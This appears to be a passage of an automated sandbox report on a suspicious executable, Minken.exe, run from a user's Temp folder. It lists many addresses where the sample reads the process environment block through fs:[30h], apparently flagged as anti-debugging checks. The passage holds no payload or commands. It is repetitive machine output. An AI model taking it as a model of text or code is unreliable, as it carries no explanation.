Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D019F mov eax, dword ptr fs:[00000030h]	12_2_231D019F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D019F mov eax, dword ptr fs:[00000030h]	12_2_231D019F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314A197 mov eax, dword ptr fs:[00000030h]	12_2_2314A197
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314A197 mov eax, dword ptr fs:[00000030h]	12_2_2314A197
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314A197 mov eax, dword ptr fs:[00000030h]	12_2_2314A197
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232011A4 mov eax, dword ptr fs:[00000030h]	12_2_232011A4
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232011A4 mov eax, dword ptr fs:[00000030h]	12_2_232011A4
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232011A4 mov eax, dword ptr fs:[00000030h]	12_2_232011A4
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232011A4 mov eax, dword ptr fs:[00000030h]	12_2_232011A4
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231A7190 mov eax, dword ptr fs:[00000030h]	12_2_231A7190
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23190185 mov eax, dword ptr fs:[00000030h]	12_2_23190185
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316B1B0 mov eax, dword ptr fs:[00000030h]	12_2_2316B1B0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320C188 mov eax, dword ptr fs:[00000030h]	12_2_2320C188
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320C188 mov eax, dword ptr fs:[00000030h]	12_2_2320C188
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232261E5 mov eax, dword ptr fs:[00000030h]	12_2_232261E5
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318D1D0 mov eax, dword ptr fs:[00000030h]	12_2_2318D1D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318D1D0 mov ecx, dword ptr fs:[00000030h]	12_2_2318D1D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CE1D0 mov eax, dword ptr fs:[00000030h]	12_2_231CE1D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CE1D0 mov eax, dword ptr fs:[00000030h]	12_2_231CE1D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CE1D0 mov ecx, dword ptr fs:[00000030h]	12_2_231CE1D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CE1D0 mov eax, dword ptr fs:[00000030h]	12_2_231CE1D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CE1D0 mov eax, dword ptr fs:[00000030h]	12_2_231CE1D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231801F8 mov eax, dword ptr fs:[00000030h]	12_2_231801F8
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232161C3 mov eax, dword ptr fs:[00000030h]	12_2_232161C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232161C3 mov eax, dword ptr fs:[00000030h]	12_2_232161C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231F71F9 mov esi, dword ptr fs:[00000030h]	12_2_231F71F9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232251CB mov eax, dword ptr fs:[00000030h]	12_2_232251CB
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]	12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]	12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]	12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]	12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]	12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]	12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]	12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]	12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]	12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]	12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]	12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]	12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231751EF mov eax, dword ptr fs:[00000030h]	12_2_231751EF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231551ED mov eax, dword ptr fs:[00000030h]	12_2_231551ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E016 mov eax, dword ptr fs:[00000030h]	12_2_2316E016
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E016 mov eax, dword ptr fs:[00000030h]	12_2_2316E016
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E016 mov eax, dword ptr fs:[00000030h]	12_2_2316E016
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E016 mov eax, dword ptr fs:[00000030h]	12_2_2316E016
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D4000 mov ecx, dword ptr fs:[00000030h]	12_2_231D4000
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321903E mov eax, dword ptr fs:[00000030h]	12_2_2321903E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321903E mov eax, dword ptr fs:[00000030h]	12_2_2321903E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321903E mov eax, dword ptr fs:[00000030h]	12_2_2321903E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321903E mov eax, dword ptr fs:[00000030h]	12_2_2321903E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E6030 mov eax, dword ptr fs:[00000030h]	12_2_231E6030
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314A020 mov eax, dword ptr fs:[00000030h]	12_2_2314A020
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314C020 mov eax, dword ptr fs:[00000030h]	12_2_2314C020
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231F705E mov ebx, dword ptr fs:[00000030h]	12_2_231F705E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231F705E mov eax, dword ptr fs:[00000030h]	12_2_231F705E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23225060 mov eax, dword ptr fs:[00000030h]	12_2_23225060
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23152050 mov eax, dword ptr fs:[00000030h]	12_2_23152050
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B052 mov eax, dword ptr fs:[00000030h]	12_2_2317B052
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D6050 mov eax, dword ptr fs:[00000030h]	12_2_231D6050
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317C073 mov eax, dword ptr fs:[00000030h]	12_2_2317C073
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]	12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov ecx, dword ptr fs:[00000030h]	12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]	12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]	12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]	12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]	12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]	12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]	12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]	12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]	12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]	12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]	12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23161070 mov eax, dword ptr fs:[00000030h]	12_2_23161070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CD070 mov ecx, dword ptr fs:[00000030h]	12_2_231CD070
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D106E mov eax, dword ptr fs:[00000030h]	12_2_231D106E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23155096 mov eax, dword ptr fs:[00000030h]	12_2_23155096
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318909C mov eax, dword ptr fs:[00000030h]	12_2_2318909C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317D090 mov eax, dword ptr fs:[00000030h]	12_2_2317D090
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317D090 mov eax, dword ptr fs:[00000030h]	12_2_2317D090
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314D08D mov eax, dword ptr fs:[00000030h]	12_2_2314D08D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232160B8 mov eax, dword ptr fs:[00000030h]	12_2_232160B8
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232160B8 mov ecx, dword ptr fs:[00000030h]	12_2_232160B8
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DD080 mov eax, dword ptr fs:[00000030h]	12_2_231DD080
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DD080 mov eax, dword ptr fs:[00000030h]	12_2_231DD080
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315208A mov eax, dword ptr fs:[00000030h]	12_2_2315208A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E80A8 mov eax, dword ptr fs:[00000030h]	12_2_231E80A8
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D20DE mov eax, dword ptr fs:[00000030h]	12_2_231D20DE
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231790DB mov eax, dword ptr fs:[00000030h]	12_2_231790DB
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov ecx, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov ecx, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov ecx, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov ecx, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0 mov eax, dword ptr fs:[00000030h]	12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CD0C0 mov eax, dword ptr fs:[00000030h]	12_2_231CD0C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CD0C0 mov eax, dword ptr fs:[00000030h]	12_2_231CD0C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314C0F0 mov eax, dword ptr fs:[00000030h]	12_2_2314C0F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231920F0 mov ecx, dword ptr fs:[00000030h]	12_2_231920F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231750E4 mov eax, dword ptr fs:[00000030h]	12_2_231750E4
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231750E4 mov ecx, dword ptr fs:[00000030h]	12_2_231750E4
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314A0E3 mov ecx, dword ptr fs:[00000030h]	12_2_2314A0E3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232250D9 mov eax, dword ptr fs:[00000030h]	12_2_232250D9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231580E9 mov eax, dword ptr fs:[00000030h]	12_2_231580E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D60E0 mov eax, dword ptr fs:[00000030h]	12_2_231D60E0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23150710 mov eax, dword ptr fs:[00000030h]	12_2_23150710
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318F71F mov eax, dword ptr fs:[00000030h]	12_2_2318F71F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318F71F mov eax, dword ptr fs:[00000030h]	12_2_2318F71F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23180710 mov eax, dword ptr fs:[00000030h]	12_2_23180710
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321972B mov eax, dword ptr fs:[00000030h]	12_2_2321972B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320F72E mov eax, dword ptr fs:[00000030h]	12_2_2320F72E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23157703 mov eax, dword ptr fs:[00000030h]	12_2_23157703
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23155702 mov eax, dword ptr fs:[00000030h]	12_2_23155702
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23155702 mov eax, dword ptr fs:[00000030h]	12_2_23155702
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318C700 mov eax, dword ptr fs:[00000030h]	12_2_2318C700
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2322B73C mov eax, dword ptr fs:[00000030h]	12_2_2322B73C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2322B73C mov eax, dword ptr fs:[00000030h]	12_2_2322B73C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2322B73C mov eax, dword ptr fs:[00000030h]	12_2_2322B73C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2322B73C mov eax, dword ptr fs:[00000030h]	12_2_2322B73C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318273C mov eax, dword ptr fs:[00000030h]	12_2_2318273C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318273C mov ecx, dword ptr fs:[00000030h]	12_2_2318273C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318273C mov eax, dword ptr fs:[00000030h]	12_2_2318273C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149730 mov eax, dword ptr fs:[00000030h]	12_2_23149730
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149730 mov eax, dword ptr fs:[00000030h]	12_2_23149730
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231CC730 mov eax, dword ptr fs:[00000030h]	12_2_231CC730
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23185734 mov eax, dword ptr fs:[00000030h]	12_2_23185734
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315973A mov eax, dword ptr fs:[00000030h]	12_2_2315973A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315973A mov eax, dword ptr fs:[00000030h]	12_2_2315973A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23153720 mov eax, dword ptr fs:[00000030h]	12_2_23153720
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316F720 mov eax, dword ptr fs:[00000030h]	12_2_2316F720
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316F720 mov eax, dword ptr fs:[00000030h]	12_2_2316F720
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316F720 mov eax, dword ptr fs:[00000030h]	12_2_2316F720
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318C720 mov eax, dword ptr fs:[00000030h]	12_2_2318C720
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318C720 mov eax, dword ptr fs:[00000030h]	12_2_2318C720
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DE75D mov eax, dword ptr fs:[00000030h]	12_2_231DE75D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23150750 mov eax, dword ptr fs:[00000030h]	12_2_23150750
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D4755 mov eax, dword ptr fs:[00000030h]	12_2_231D4755
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23192750 mov eax, dword ptr fs:[00000030h]	12_2_23192750
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23192750 mov eax, dword ptr fs:[00000030h]	12_2_23192750
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318674D mov esi, dword ptr fs:[00000030h]	12_2_2318674D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318674D mov eax, dword ptr fs:[00000030h]	12_2_2318674D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318674D mov eax, dword ptr fs:[00000030h]	12_2_2318674D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23163740 mov eax, dword ptr fs:[00000030h]	12_2_23163740
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23163740 mov eax, dword ptr fs:[00000030h]	12_2_23163740
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23163740 mov eax, dword ptr fs:[00000030h]	12_2_23163740
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23158770 mov eax, dword ptr fs:[00000030h]	12_2_23158770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]	12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]	12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]	12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]	12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]	12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]	12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]	12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]	12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]	12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]	12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]	12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770 mov eax, dword ptr fs:[00000030h]	12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23223749 mov eax, dword ptr fs:[00000030h]	12_2_23223749
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B765 mov eax, dword ptr fs:[00000030h]	12_2_2314B765
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B765 mov eax, dword ptr fs:[00000030h]	12_2_2314B765
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B765 mov eax, dword ptr fs:[00000030h]	12_2_2314B765
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B765 mov eax, dword ptr fs:[00000030h]	12_2_2314B765
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232237B6 mov eax, dword ptr fs:[00000030h]	12_2_232237B6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317D7B0 mov eax, dword ptr fs:[00000030h]	12_2_2317D7B0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320F78A mov eax, dword ptr fs:[00000030h]	12_2_2320F78A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]	12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]	12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]	12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]	12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]	12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]	12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]	12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]	12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F7BA mov eax, dword ptr fs:[00000030h]	12_2_2314F7BA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DF7AF mov eax, dword ptr fs:[00000030h]	12_2_231DF7AF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DF7AF mov eax, dword ptr fs:[00000030h]	12_2_231DF7AF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DF7AF mov eax, dword ptr fs:[00000030h]	12_2_231DF7AF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DF7AF mov eax, dword ptr fs:[00000030h]	12_2_231DF7AF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DF7AF mov eax, dword ptr fs:[00000030h]	12_2_231DF7AF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D97A9 mov eax, dword ptr fs:[00000030h]	12_2_231D97A9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231507AF mov eax, dword ptr fs:[00000030h]	12_2_231507AF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315C7C0 mov eax, dword ptr fs:[00000030h]	12_2_2315C7C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231557C0 mov eax, dword ptr fs:[00000030h]	12_2_231557C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231557C0 mov eax, dword ptr fs:[00000030h]	12_2_231557C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231557C0 mov eax, dword ptr fs:[00000030h]	12_2_231557C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D07C3 mov eax, dword ptr fs:[00000030h]	12_2_231D07C3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231547FB mov eax, dword ptr fs:[00000030h]	12_2_231547FB
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231547FB mov eax, dword ptr fs:[00000030h]	12_2_231547FB
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315D7E0 mov ecx, dword ptr fs:[00000030h]	12_2_2315D7E0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231727ED mov eax, dword ptr fs:[00000030h]	12_2_231727ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231727ED mov eax, dword ptr fs:[00000030h]	12_2_231727ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231727ED mov eax, dword ptr fs:[00000030h]	12_2_231727ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231DE7E1 mov eax, dword ptr fs:[00000030h]	12_2_231DE7E1
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23192619 mov eax, dword ptr fs:[00000030h]	12_2_23192619
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23153616 mov eax, dword ptr fs:[00000030h]	12_2_23153616
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23153616 mov eax, dword ptr fs:[00000030h]	12_2_23153616
